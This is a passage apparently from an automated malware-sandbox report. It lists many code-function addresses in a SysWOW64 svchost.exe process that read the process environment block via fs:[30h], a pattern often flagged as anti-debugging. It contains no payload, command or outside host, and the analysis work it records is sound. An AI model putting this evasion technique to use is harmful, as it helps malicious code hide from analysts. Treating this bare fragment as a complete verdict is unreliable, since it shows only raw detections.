            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A08324 mov eax, dword ptr fs:[00000030h]2_2_03A08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950310 mov ecx, dword ptr fs:[00000030h]2_2_03950310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A30B mov eax, dword ptr fs:[00000030h]2_2_0396A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov ecx, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B035C mov eax, dword ptr fs:[00000030h]2_2_039B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA352 mov eax, dword ptr fs:[00000030h]2_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8350 mov ecx, dword ptr fs:[00000030h]2_2_039D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B2349 mov eax, dword ptr fs:[00000030h]2_2_039B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D437C mov eax, dword ptr fs:[00000030h]2_2_039D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]2_2_03A0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]2_2_0396E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]2_2_039B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]2_2_039402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]2_2_039C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]2_2_0393A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]2_2_039402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]2_2_03A062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]2_2_0392823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]2_2_0392A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]2_2_03936259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]2_2_039EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]2_2_039B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]2_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]2_2_03934260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
